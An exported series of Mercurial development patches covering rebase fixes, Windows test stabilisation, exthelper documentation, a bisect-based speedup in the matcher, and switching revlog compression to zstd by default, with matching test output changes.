"python3-sys", ] @@ -570,6 +571,25 @@ ] [[package]] +name = "paste" +version = "0.1.18" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "45ca20c77d80be666aef2b45486da86238fabe33e38306bd3118fe4af33fa880" +dependencies = [ + "paste-impl", + "proc-macro-hack", +] + +[[package]] +name = "paste-impl" +version = "0.1.18" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d95a7db200b97ef370c8e6de0088252f7e0dfff7d047a28528e47456c0fc98b6" +dependencies = [ + "proc-macro-hack", +] + +[[package]] name = "pkg-config" version = "0.3.19" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -610,9 +630,9 @@ [[package]] name = "python27-sys" -version = "0.4.1" +version = "0.5.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "67cb041de8615111bf224dd75667af5f25c6e032118251426fed7f1b70ce4c8c" +checksum = "f485897ed7048f5032317c4e427800ef9f2053355516524d73952b8b07032054" dependencies = [ "libc", "regex", @@ -620,9 +640,9 @@ [[package]] name = "python3-sys" -version = "0.4.1" +version = "0.5.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "90af11779515a1e530af60782d273b59ac79d33b0e253c071a728563957c76d4" +checksum = "5b29b99c6868eb02beb3bf6ed025c8bcdf02efc149b8e80347d3e5d059a806db" dependencies = [ "libc", "regex", diff --git a/rust/hg-cpython/Cargo.toml b/rust/hg-cpython/Cargo.toml --- a/rust/hg-cpython/Cargo.toml +++ b/rust/hg-cpython/Cargo.toml @@ -29,5 +29,5 @@ env_logger = "0.7.1" [dependencies.cpython] -version = "0.4.1" +version = "0.5.2" default-features = false # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616686696 25200 # Thu Mar 25 08:38:16 2021 -0700 # Node ID 82b17bfc13ebf0dd1619953c200c7421ba3315ff # Parent c7c6c11fe1e4fd3b936b2145b112bd8006a88ba6 rebase: remove duplicate initialization of a field `obsolete_with_successor_in_destination` is already initialized in the constructor. Differential Revision: https://phab.mercurial-scm.org/D10268 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -350,7 +350,6 @@ def _handleskippingobsolete(self): """Compute structures necessary for skipping obsolete revisions""" - self.obsolete_with_successor_in_destination = {} if not self.ui.configbool(b'experimental', b'rebaseskipobsolete'): return obsoleteset = {r for r in self.state if self.repo[r].obsolete()} # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616697316 25200 # Thu Mar 25 11:35:16 2021 -0700 # Node ID d9601243b73c16b5894492a33895bf9e457602e0 # Parent 82b17bfc13ebf0dd1619953c200c7421ba3315ff rebase: when using --keep, don't care about pruned commits or divergence `hg rebase --keep` creates duplicate commits (not successors), so I was surprised that it still skips pruned commits and errors out if it "would cause divergence" (it wouldn't). I guess this was just an oversight. We didn't have any tests for it, so I also included that. Differential Revision: https://phab.mercurial-scm.org/D10269 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -350,6 +350,8 @@ def _handleskippingobsolete(self): """Compute structures necessary for skipping obsolete revisions""" + if self.keepf: + return if not self.ui.configbool(b'experimental', b'rebaseskipobsolete'): return obsoleteset = {r for r in self.state if self.repo[r].obsolete()} diff --git a/tests/test-rebase-obsolete2.t b/tests/test-rebase-obsolete2.t --- a/tests/test-rebase-obsolete2.t +++ b/tests/test-rebase-obsolete2.t @@ -317,3 +317,25 @@ note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" rebasing 21:7bdc8a87673d tip "dummy change" $ cd .. + +Can rebase pruned and rewritten commits with --keep + + $ hg init keep + $ cd keep + $ hg debugdrawdag <<'EOS' + > D + > | + > C + > | + > F B E # prune: B + > \|/ # rebase: C -> E + > A + > EOS + 1 new orphan changesets + + $ hg rebase -b D -d F --keep + rebasing 1:112478962961 B "B" + rebasing 4:26805aba1e60 C "C" + rebasing 5:f585351a92f8 D tip "D" + + $ cd .. # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616711911 25200 # Thu Mar 25 15:38:31 2021 -0700 # Node ID 6b42343f3cb61bfedc5909979bf1252df462ea83 # Parent d9601243b73c16b5894492a33895bf9e457602e0 tests: avoid using rebaseskipobsolete=0 I'm about to delete the `rebaseskipobsolete` config. This patch updates a test to get hidden commits into the rebase state by using `hg debugobsolete` instead of setting `rebaseskipobsolete=0`. Differential Revision: https://phab.mercurial-scm.org/D10270 diff --git a/tests/test-rebase-obsolete4.t b/tests/test-rebase-obsolete4.t --- a/tests/test-rebase-obsolete4.t +++ b/tests/test-rebase-obsolete4.t @@ -23,7 +23,6 @@ $ hg init rbsrepo && cd rbsrepo $ echo "[experimental]" > .hg/hgrc $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc $ echo root > root && hg ci -Am root adding root $ echo a > a && hg ci -Am a @@ -124,30 +123,24 @@ / o 0:426bada5c675 A -For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.), +For some reasons (--hidden, directaccess, etc.), rebasestate may contain hidden hashes. "rebase --abort" should work regardless. $ hg init $TESTTMP/hidden-state1 $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF $ hg debugdrawdag <<'EOS' > C > | - > D B # prune: B, C - > |/ # B/D=B + > D B # B/D=B + > |/ > A > EOS $ eval `hg tags -T '{tag}={node}\n'` $ rm .hg/localtags - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) + $ hg update -q $C $ hg rebase -s $B -d $D rebasing 1:2ec65233581b "B" merging D @@ -155,12 +148,19 @@ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') [240] + $ hg debugobsolete $B + 1 new obsolescence markers + obsoleted 1 changesets + 1 new orphan changesets + $ hg debugobsolete $C + 1 new obsolescence markers + obsoleted 1 changesets $ cp -R . $TESTTMP/hidden-state2 $ hg log -G @ 2:b18e25de2cf5 D | - | % 1:2ec65233581b B (pruned using prune) + | % 1:2ec65233581b B (pruned) |/ o 0:426bada5c675 A @@ -183,14 +183,10 @@ (no more unresolved files) continue: hg rebase --continue $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" + note: not rebasing 1:2ec65233581b "B", it has no successor + note: not rebasing 3:7829726be4dc tip "C", it has no successor $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D + @ 2:b18e25de2cf5 D | o 0:426bada5c675 A # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617476420 14400 # Sat Apr 03 15:00:20 2021 -0400 # Node ID 466236e99eac18db6286a95297bcc715d6170f28 # Parent 6b42343f3cb61bfedc5909979bf1252df462ea83 tests: update the detailed exit codes in test-phabricator.t I'm guessing this has slipped through because most people don't have the necessary `pytest-vcr` package installed. Differential Revision: https://phab.mercurial-scm.org/D10297 diff --git a/tests/test-phabricator.t b/tests/test-phabricator.t --- a/tests/test-phabricator.t +++ b/tests/test-phabricator.t @@ -48,7 +48,7 @@ options: (use 'hg debugcallconduit -h' to show more help) - [255] + [10] $ hg phabread abort: empty DREVSPEC set [255] # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617476529 14400 # Sat Apr 03 15:02:09 2021 -0400 # Node ID 7ce8b4d2bd55f100de4faec766bcf177832079b6 # Parent 466236e99eac18db6286a95297bcc715d6170f28 tests: update the detailed exit codes for icasefs gated tests The fact that there's already a detailed exit code after the last change here in test-casecollision-merge.t gives me some pause, but maybe it was found and changed manually? Differential Revision: https://phab.mercurial-scm.org/D10298 diff --git a/tests/test-casecollision-merge.t b/tests/test-casecollision-merge.t --- a/tests/test-casecollision-merge.t +++ b/tests/test-casecollision-merge.t @@ -145,7 +145,7 @@ $ hg merge abort: case-folding collision between [aA] and [Aa] (re) - [255] + [20] $ hg parents --template '{rev}\n' 4 $ hg status -A @@ -158,7 +158,7 @@ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg merge abort: case-folding collision between [aA] and [Aa] (re) - [255] + [20] $ hg parents --template '{rev}\n' 2 $ hg status -A @@ -213,7 +213,7 @@ $ hg merge 0 abort: case-folding collision between Aa and directory of aA/a - [255] + [20] (note: no collision between 0 and 00 or 000/f) Directory case-folding collision: @@ -328,7 +328,7 @@ A B $ hg update abort: case-folding collision between [bB] and [Bb] (re) - [255] + [20] $ hg update --check abort: uncommitted changes diff --git a/tests/test-casefolding.t b/tests/test-casefolding.t --- a/tests/test-casefolding.t +++ b/tests/test-casefolding.t @@ -115,7 +115,7 @@ $ hg up A: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat a gold $ rm a # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617495937 14400 # Sat Apr 03 20:25:37 2021 -0400 # Node ID 915a60bf3cb627a59be97084c7161700d8f5b4f9 # Parent 7ce8b4d2bd55f100de4faec766bcf177832079b6 tests: handle Windows file separator differences in test-config.t Differential Revision: https://phab.mercurial-scm.org/D10299 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -1,3 +1,17 @@ +Windows needs ';' as a file separator in an environment variable, and MSYS +doesn't automatically convert it in every case. + +#if windows + $ path_list_var() { + > echo $1 | sed 's/:/;/' + > } +#else + $ path_list_var() { + > echo $1 + > } +#endif + + hide outer repo $ hg init @@ -446,7 +460,7 @@ If file B is read after file A, value from B overwrite value from A. - $ HGRCPATH="file-A.rc:file-B.rc" hg config config-test.basic + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg config config-test.basic value-B Ordering from include @@ -462,7 +476,7 @@ command line override --------------------- - $ HGRCPATH="file-A.rc:file-B.rc" hg config config-test.basic --config config-test.basic=value-CLI + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg config config-test.basic --config config-test.basic=value-CLI value-CLI Alias ordering @@ -480,7 +494,7 @@ value-A $ HGRCPATH="file-B.rc" hg log -r . value-B - $ HGRCPATH="file-A.rc:file-B.rc" hg log -r . + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg log -r . value-B Alias and include @@ -497,5 +511,5 @@ command line override --------------------- - $ HGRCPATH="file-A.rc:file-B.rc" hg log -r . --config ui.logtemplate="value-CLI\n" + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg log -r . --config ui.logtemplate="value-CLI\n" value-CLI # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617496005 14400 # Sat Apr 03 20:26:45 2021 -0400 # Node ID 802ba3c81507fcf1c470485e19278edc73f782f8 # Parent 915a60bf3cb627a59be97084c7161700d8f5b4f9 tests: stablize test-hook.t on Windows Apparently, hooks can't run `echo` directly, even from MSYS. Differential Revision: https://phab.mercurial-scm.org/D10300 diff --git a/tests/test-hook.t b/tests/test-hook.t --- a/tests/test-hook.t +++ b/tests/test-hook.t @@ -1407,12 +1407,12 @@ $ cat << EOF >> .hg/hgrc > [hooks] - > pre-version.testing-default=echo '### default ###' plain: \${HGPLAIN:-'<unset>'} - > pre-version.testing-yes=echo '### yes #######' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-default=sh -c "echo '### default ###' plain: \${HGPLAIN:-'<unset>'}" + > pre-version.testing-yes=sh -c "echo '### yes #######' plain: \${HGPLAIN:-'<unset>'}" > pre-version.testing-yes:run-with-plain=yes - > pre-version.testing-no=echo '### no ########' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-no=sh -c "echo '### no ########' plain: \${HGPLAIN:-'<unset>'}" > pre-version.testing-no:run-with-plain=no - > pre-version.testing-auto=echo '### auto ######' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-auto=sh -c "echo '### auto ######' plain: \${HGPLAIN:-'<unset>'}" > pre-version.testing-auto:run-with-plain=auto > EOF # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617498945 14400 # Sat Apr 03 21:15:45 2021 -0400 # Node ID ed286d150aa89d742a24015be22f0b1c36855697 # Parent 802ba3c81507fcf1c470485e19278edc73f782f8 setup: copy python3.dll next to hg.exe when building on Windows for hgext.git I thought I took care of this already, but it must have been that I just manually copied the file over locally when debugging why the pygit2 library wasn't loading. The problem with that is what was copied over was from py38, and then running a py39 build hard crashed when the extension was loaded. Differential Revision: https://phab.mercurial-scm.org/D10301 diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -817,6 +817,22 @@ if not os.path.exists(dest): shutil.copy(buf.value, dest) + # Also overwrite python3.dll so that hgext.git is usable. + # TODO: also handle the MSYS flavor + if sys.version_info[0] >= 3: + python_x = os.path.join( + os.path.dirname(fsdecode(buf.value)), + "python3.dll", + ) + + if os.path.exists(python_x): + dest = os.path.join( + os.path.dirname(self.hgtarget), + os.path.basename(python_x), + ) + + shutil.copy(python_x, dest) + if not pythonlib: log.warn( 'could not determine Python DLL filename; assuming pythonXY' # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617641073 14400 # Mon Apr 05 12:44:33 2021 -0400 # Node ID 41d43d12c2c4206b9316adb0edb58da929d25c6e # Parent ed286d150aa89d742a24015be22f0b1c36855697 tests: restore the ability to run `black` on Windows The hghave test for black silently stopped working with the change in 08fd76a553c9. This was the output of what it was hitting when run in the test environment: Traceback (most recent call last):\r (esc) File "c:\\users\\matt\\appdata\\local\\programs\\python\\python39\\lib\\runpy.py", line 197, in _run_module_as_main\r (esc) return _run_code(code, main_globals, None,\r (esc) File "c:\\users\\matt\\appdata\\local\\programs\\python\\python39\\lib\\runpy.py", line 87, in _run_code\r (esc) exec(code, run_globals)\r (esc) File "c:\\Users\\Matt\\AppData\\Roaming\\Python\\Python39\\Scripts\\black.exe\\__main__.py", line 4, in <module>\r (esc) File "C:\\Users\\Matt\\AppData\\Roaming\\Python\\Python39\\site-packages\\black\\__init__.py", line 70, in <module>\r (esc) CACHE_DIR = Path(user_cache_dir("black", version=__version__))\r (esc) File "C:\\Users\\Matt\\AppData\\Roaming\\Python\\Python39\\site-packages\\appdirs.py", line 293, in user_cache_dir\r (esc) path = os.path.normpath(_get_win_folder("CSIDL_LOCAL_APPDATA"))\r (esc) File "C:\\Users\\Matt\\AppData\\Roaming\\Python\\Python39\\site-packages\\appdirs.py", line 481, in _get_win_folder_with_pywin32\r (esc) dir = shell.SHGetFolderPath(0, getattr(shellcon, csidl_name), 0, 0)\r (esc) pywintypes.com_error: (-2147024893, '$ENOTDIR$.', None, None)\r (esc) [1] Differential Revision: https://phab.mercurial-scm.org/D10310 diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -140,9 +140,22 @@ """Return the match object if cmd executes successfully and its output is matched by the supplied regular expression. """ + + # Tests on Windows have to fake USERPROFILE to point to the test area so + # that `~` is properly expanded on py3.8+. However, some tools like black + # make calls that need the real USERPROFILE in order to run `foo --version`. + env = os.environ + if os.name == 'nt': + env = os.environ.copy() + env['USERPROFILE'] = env['REALUSERPROFILE'] + r = re.compile(regexp) p = subprocess.Popen( - cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT + cmd, + shell=True, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + env=env, ) s = p.communicate()[0] ret = p.returncode diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -1371,6 +1371,7 @@ env['TESTNAME'] = self.name env['HOME'] = _bytes2sys(self._testtmp) if os.name == 'nt': + env['REALUSERPROFILE'] = env['USERPROFILE'] # py3.8+ ignores HOME: https://bugs.python.org/issue36264 env['USERPROFILE'] = env['HOME'] formated_timeout = _bytes2sys(b"%d" % default_defaults['timeout'][1]) diff --git a/tests/test-check-format.t b/tests/test-check-format.t --- a/tests/test-check-format.t +++ b/tests/test-check-format.t @@ -1,5 +1,11 @@ #require black test-repo +Black needs the real USERPROFILE in order to run on Windows +#if msys + $ USERPROFILE="$REALUSERPROFILE" + $ export USERPROFILE +#endif + $ cd $RUNTESTDIR/.. $ black --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1617134722 25200 # Tue Mar 30 13:05:22 2021 -0700 # Node ID 887f89b100ac7917f9060f2c194a41ae727ae74a # Parent 41d43d12c2c4206b9316adb0edb58da929d25c6e exthelper: improve docs to indicate what module vars are needed I recently tried creating an extension "from scratch" using exthelper, and it wasn't obvious that you needed these. I believe that a careful reading of one of the comments would tell you that they were required, but it's easy to miss and having the examples be "complete" is helpful. Differential Revision: https://phab.mercurial-scm.org/D10295 diff --git a/mercurial/exthelper.py b/mercurial/exthelper.py --- a/mercurial/exthelper.py +++ b/mercurial/exthelper.py @@ -46,13 +46,22 @@ # ext.py eh = exthelper.exthelper() - # As needed: + # As needed (failure to do this will mean your registration will not + # happen): cmdtable = eh.cmdtable configtable = eh.configtable filesetpredicate = eh.filesetpredicate revsetpredicate = eh.revsetpredicate templatekeyword = eh.templatekeyword + # As needed (failure to do this will mean your eh.wrap*-decorated + # functions will not wrap, and/or your eh.*setup-decorated functions + # will not execute): + uisetup = eh.finaluisetup + extsetup = eh.finalextsetup + reposetup = eh.finalreposetup + uipopulate = eh.finaluipopulate + @eh.command(b'mynewcommand', [(b'r', b'rev', [], _(b'operate on these revisions'))], _(b'-r REV...'), @@ -155,7 +164,7 @@ c(ui) def finalextsetup(self, ui): - """Method to be used as a the extension extsetup + """Method to be used as the extension extsetup The following operations belong here: @@ -201,6 +210,9 @@ example:: + # Required, otherwise your uisetup function(s) will not execute. + uisetup = eh.finaluisetup + @eh.uisetup def setupbabar(ui): print('this is uisetup!') @@ -213,6 +225,9 @@ example:: + # Required, otherwise your uipopulate function(s) will not execute. + uipopulate = eh.finaluipopulate + @eh.uipopulate def setupfoo(ui): print('this is uipopulate!') @@ -225,6 +240,9 @@ example:: + # Required, otherwise your extsetup function(s) will not execute. + extsetup = eh.finalextsetup + @eh.extsetup def setupcelestine(ui): print('this is extsetup!') @@ -237,6 +255,9 @@ example:: + # Required, otherwise your reposetup function(s) will not execute. + reposetup = eh.finalreposetup + @eh.reposetup def setupzephir(ui, repo): print('this is reposetup!') @@ -258,6 +279,11 @@ example:: + # Required if `extension` is not provided + uisetup = eh.finaluisetup + # Required if `extension` is provided + extsetup = eh.finalextsetup + @eh.wrapcommand(b'summary') def wrapsummary(orig, ui, repo, *args, **kwargs): ui.note(b'Barry!') @@ -298,8 +324,11 @@ example:: - @eh.function(discovery, b'checkheads') - def wrapfunction(orig, *args, **kwargs): + # Required, otherwise the function will not be wrapped + uisetup = eh.finaluisetup + + @eh.wrapfunction(discovery, b'checkheads') + def wrapcheckheads(orig, *args, **kwargs): ui.note(b'His head smashed in and his heart cut out') return orig(*args, **kwargs) """ # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1617220014 25200 # Wed Mar 31 12:46:54 2021 -0700 # Node ID 8bca353b1ebc25c08dd2d72bbf4efd7b44b7bd1b # Parent 887f89b100ac7917f9060f2c194a41ae727ae74a match: convert O(n) to O(log n) in exactmatcher.visitchildrenset When using narrow, during rebase this is called (at least) once per directory in the set of files in the commit being rebased. Every time it's called, we did the set arithmetic (now extracted and cached), which was probably pretty cheap but not necessary to repeat each time, looped over every item in the matcher and kept things that started with the directory we were querying. With very large narrowspecs, and a commit that touched a file in a large number of directories, this was slow. In a pathological repo, the rebase of a single commit (that touched over 17k files, I believe in approximately as many directories) with a narrowspec that had >32k entries took 8,246s of profiled time, with 5,007s of that spent in visitchildrenset (transitively). With this change, the time spent in visitchildrenset is less than 34s (which is where my profile cut off). Most of the remaining time was network access due to our custom remotefilelog-based setup not properly prefetching. Differential Revision: https://phab.mercurial-scm.org/D10294 diff --git a/mercurial/match.py b/mercurial/match.py --- a/mercurial/match.py +++ b/mercurial/match.py @@ -7,6 +7,7 @@ from __future__ import absolute_import, print_function +import bisect import copy import itertools import os @@ -798,14 +799,38 @@ def visitdir(self, dir): return dir in self._dirs + @propertycache + def _visitchildrenset_candidates(self): + """A memoized set of candidates for visitchildrenset.""" + return self._fileset | self._dirs - {b''} + + @propertycache + def _sorted_visitchildrenset_candidates(self): + """A memoized sorted list of candidates for visitchildrenset.""" + return sorted(self._visitchildrenset_candidates) + def visitchildrenset(self, dir): if not self._fileset or dir not in self._dirs: return set() - candidates = self._fileset | self._dirs - {b''} - if dir != b'': + if dir == b'': + candidates = self._visitchildrenset_candidates + else: + candidates = self._sorted_visitchildrenset_candidates d = dir + b'/' - candidates = {c[len(d) :] for c in candidates if c.startswith(d)} + # Use bisect to find the first element potentially starting with d + # (i.e. >= d). This should always find at least one element (we'll + # assert later if this is not the case). + first = bisect.bisect_left(candidates, d) + # We need a representation of the first element that is > d that + # does not start with d, so since we added a `/` on the end of dir, + # we'll add whatever comes after slash (we could probably assume + # that `0` is after `/`, but let's not) to the end of dir instead. + dnext = dir + encoding.strtolocal(chr(ord(b'/') + 1)) + # Use bisect to find the first element >= d_next + last = bisect.bisect_left(candidates, dnext, lo=first) + dlen = len(d) + candidates = {c[dlen:] for c in candidates[first:last]} # self._dirs includes all of the directories, recursively, so if # we're attempting to match foo/bar/baz.txt, it'll have '', 'foo', # 'foo/bar' in it. Thus we can safely ignore a candidate that has a # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617795075 -7200 # Wed Apr 07 13:31:15 2021 +0200 # Node ID 0abf5eba00423035c975213416d56ff9c24d1989 # Parent 8bca353b1ebc25c08dd2d72bbf4efd7b44b7bd1b rhg: make rhg recognise it supports zstd compression for revlogs It already did, but was not aware of it. Differential Revision: https://phab.mercurial-scm.org/D10324 diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -81,6 +81,7 @@ SHARESAFE_REQUIREMENT, SPARSEREVLOG_REQUIREMENT, RELATIVE_SHARED_REQUIREMENT, + REVLOG_COMPRESSION_ZSTD, // As of this writing everything rhg does is read-only. // When it starts writing to the repository, it’ll need to either keep the // persistent nodemap up to date or remove this entry: @@ -151,3 +152,7 @@ /// `.hg/store/requires` are present. #[allow(unused)] pub(crate) const SHARESAFE_REQUIREMENT: &str = "share-safe"; + +/// A repository that use zstd compression inside its revlog +#[allow(unused)] +pub(crate) const REVLOG_COMPRESSION_ZSTD: &str = "revlog-compression-zstd"; # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617728119 -7200 # Tue Apr 06 18:55:19 2021 +0200 # Node ID 84a93fa7ecfd9e6509d08824e2d11831e582a2fd # Parent 0abf5eba00423035c975213416d56ff9c24d1989 revlog-compression: use zstd by default (if available) As see in changeset bb271ec2fbfb, zstd is 20% to 50% faster for reading and writing. Use take advantage of the new config behavior to try zstd by default, falling back to zlib is zstd is not available on that plateform. Differential Revision: https://phab.mercurial-scm.org/D10326 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1307,7 +1307,7 @@ coreconfigitem( b'format', b'revlog-compression', - default=lambda: [b'zlib'], + default=lambda: [b'zstd', b'zlib'], alias=[(b'experimental', b'format.compression')], ) coreconfigitem( diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -966,7 +966,7 @@ On some systems, the Mercurial installation may lack `zstd` support. - Default is `zlib`. + Default is `zstd` if available, `zlib` otherwise. ``bookmarks-in-store`` Store bookmarks in .hg/store/. This means that bookmarks are shared when diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -395,10 +395,21 @@ return True +_has_zstd = ( + b'zstd' in util.compengines + and util.compengines[b'zstd'].available() + and util.compengines[b'zstd'].revlogheader() +) + + @registerformatvariant class compressionengine(formatvariant): name = b'compression' - default = b'zlib' + + if _has_zstd: + default = b'zstd' + else: + default = b'zlib' description = _( b'Compresion algorithm used to compress data. ' diff --git a/tests/test-bundle.t b/tests/test-bundle.t --- a/tests/test-bundle.t +++ b/tests/test-bundle.t @@ -295,13 +295,16 @@ #if reporevlogstore $ hg -R test debugcreatestreamclonebundle packed.hg - writing 2664 bytes for 6 files + writing 2664 bytes for 6 files (no-zstd !) + writing 2665 bytes for 6 files (zstd !) bundle requirements: generaldelta, revlogv1, sparserevlog $ f -B 64 --size --sha1 --hexdump packed.hg - packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5 + packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5 (no-zstd !) + packed.hg: size=2841, sha1=8b645a65f49b0ae43042a9f3da56d4bfdf1c7f99 (zstd !) 0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 06 00 00 |HGS1UN..........| - 0010: 00 00 00 00 0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald| + 0010: 00 00 00 00 0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald| (no-zstd !) + 0010: 00 00 00 00 0a 69 00 23 67 65 6e 65 72 61 6c 64 |.....i.#generald| (zstd !) 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -178,16 +178,20 @@ #if stream-legacy $ hg clone --stream -U http://localhost:$HGPORT clone1 streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*/sec) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found #endif #if stream-bundle2 $ hg clone --stream -U http://localhost:$HGPORT clone1 streaming all changes - 1030 files to transfer, 96.5 KB of data - transferred 96.5 KB in * seconds (* */sec) (glob) + 1030 files to transfer, 96.5 KB of data (no-zstd !) + transferred 96.5 KB in * seconds (*/sec) (glob) (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) $ ls -1 clone1/.hg/cache branch2-base @@ -211,39 +215,56 @@ $ f --size --hex --bytes 256 body - body: size=112262 + body: size=112262 (no-zstd !) + body: size=109410 (zstd !) 0000: 04 6e 6f 6e 65 48 47 32 30 00 00 00 00 00 00 00 |.noneHG20.......| - 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| - 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98| - 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030| + 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (no-zstd !) + 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98| (no-zstd !) + 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030| (no-zstd !) + 0010: 99 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (zstd !) + 0020: 05 09 04 0c 5e 62 79 74 65 63 6f 75 6e 74 39 35 |....^bytecount95| (zstd !) + 0030: 38 39 37 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |897filecount1030| (zstd !) 0040: 72 65 71 75 69 72 65 6d 65 6e 74 73 64 6f 74 65 |requirementsdote| 0050: 6e 63 6f 64 65 25 32 43 66 6e 63 61 63 68 65 25 |ncode%2Cfncache%| 0060: 32 43 67 65 6e 65 72 61 6c 64 65 6c 74 61 25 32 |2Cgeneraldelta%2| - 0070: 43 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 |Crevlogv1%2Cspar| - 0080: 73 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 |serevlog%2Cstore| - 0090: 00 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 |....s.Bdata/0.i.| - 00a0: 03 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 |................| - 00b0: 00 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 |................| - 00c0: 29 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 |)c.I.#....Vg.g,i| - 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u| - 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....| - 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................| + 0070: 43 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 |Crevlogv1%2Cspar| (no-zstd !) + 0080: 73 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 |serevlog%2Cstore| (no-zstd !) + 0090: 00 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 |....s.Bdata/0.i.| (no-zstd !) + 00a0: 03 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 |................| (no-zstd !) + 00b0: 00 00 00 00 00 00 01 ff ff ff ff ff 